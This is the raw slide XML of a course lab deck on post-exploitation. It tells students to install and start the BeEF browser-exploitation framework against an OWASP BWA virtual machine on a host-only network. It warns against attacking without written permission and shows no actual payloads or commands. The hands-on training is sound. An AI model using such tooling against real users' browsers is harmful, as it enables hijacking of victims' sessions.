              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Important Notice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Remember not to mount such attack without the written permission of the owner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0"/>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" b="0" dirty="0"/>
              <a:t>Start both Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" b="0" dirty="0" err="1"/>
              <a:t>Lunix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" b="0" dirty="0"/>
              <a:t> VM and OWASP BWA VM and set network setting to “host-only”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Follow the next few slides to explore how to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to exploit the web application and carry out various post-exploitation activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>No submission needed.</a:t>
            </a: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b="0" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:cs typeface="Calibri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1A9927-BA32-4C89-8889-FDAFB6AA419F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0F3C28-F196-4CDE-8523-D5143AD24836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11/22/2022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49907-76FA-4DCB-A0CD-BF5FBBD7926E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ED8289-FBF4-44A5-9406-53A81023090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11/22/2022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8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C603-D5D0-427F-85F4-ECD69DDA73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EA66EF6D-3DA9-AB4A-B046-714C943A02DA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60B12-35F7-4027-9B7B-32C5F9C804A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71618" y="1025888"/>
            <a:ext cx="3812700" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2800" b="0" dirty="0"/>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2800" b="0"/>
              <a:t>beef-xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2800" b="0" dirty="0"/>
              <a:t> framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:endParaRPr lang="en-SG" sz="2800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali-Linux 2021.3 does not have BEeF pre-installed. Follow the next few pages to install and start the tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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7D652-66AD-4269-ABF4-BFD18E75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967" y="790576"/>
            <a:ext cx="4924425" cy="545782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F7F88B9C-087B-4DA0-823B-57F3B60563B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20130926">
            <a:off x="9572778" y="1470435"/>
            <a:ext cx="747252" cy="51865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33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B0E8EF4-64D9-492F-9AED-5BC4CF52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8" y="1454616"/>
            <a:ext cx="10207978" cy="4053189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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28EF5F7-D418-46D7-9100-C97703DF7640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571410" y="787894"/>
            <a:ext cx="11256894" cy="4495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/>
              <a:t>Installing beef-xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="200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6672EB-B701-44F2-8080-948871A13827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286907" y="1648571"/>
            <a:ext cx="978407" cy="48463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5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855EBC-E21B-42C4-8CD2-91C972E4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37717"/>
            <a:ext cx="10871200" cy="4239766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E8AA8-7309-4C7D-B350-6631A58D3067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571410" y="787894"/>
            <a:ext cx="11256894" cy="4495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/>
              <a:t>Enter a password of your choice...</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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A69A20-9C6B-4D72-9A41-7A10382DC135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7582352" y="2551682"/>
            <a:ext cx="978407" cy="48463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3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F19D9-2CCF-4D01-A713-8FC4F33E33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3532C-582D-4BBD-92C4-3D635944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70" y="1585783"/>
            <a:ext cx="8955043" cy="4577022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F536652-0989-4869-871C-659187C7487B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288969" y="835068"/>
            <a:ext cx="8801561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/>
              <a:t>This will appear….</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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9236269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F7FEA6FBF1641BB6A189BC6405E4D" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="702c47aa2f1b757c6992f93df2575d86">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns1="http://schemas.microsoft.com/sharepoint/v3" xmlns:ns2="16673fb3-88a0-4412-9559-9376d0b32992" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="81ff16288fd46e5497816dfe0ce691ed" ns1:_="" ns2:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3"/>
    <xsd:import namespace="16673fb3-88a0-4412-9559-9376d0b32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73fb3-88a0-4412-9559-9376d0b32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60207-51F8-4752-A9F7-0CCEB7AD7D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524D22-793F-4E77-923A-3C7F506C202D}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="9b962b54-ae34-45a2-8b95-f68042cd9a56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ffd8f815-88b9-4c59-a97c-62b35b622469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BE7D34-5FC2-48B7-849E-A79B6C5061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465</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>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Tahoma</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Contport</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Post-Exploitation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Browser Attack using BeEF</vt:lpstr>
      <vt:lpstr>Activity 6.2.3 – Hands-on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2.1 Web Application Fundamentals -Part 1</dc:title>
  <dc:creator>Hock Guan TAN (NP)</dc:creator>
  <cp:lastModifiedBy>Hock Guan TAN (NP)</cp:lastModifiedBy>
  <cp:revision>183</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-09T04:03:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-22T04:55:40Z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2021-09-09T04:03:04Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_6576bca3-5650-4758-abba-bb5d9cf9724e_Method">
    <vt:lpwstr>Standard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a87a4472-9b3f-4d63-a6a9-40a81daf237f</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_6576bca3-5650-4758-abba-bb5d9cf9724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Sensitive Normal</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="ContentTypeId">
    <vt:lpwstr>0x010100742F7FEA6FBF1641BB6A189BC6405E4D</vt:lpwstr>
  </property>
</Properties>
</file>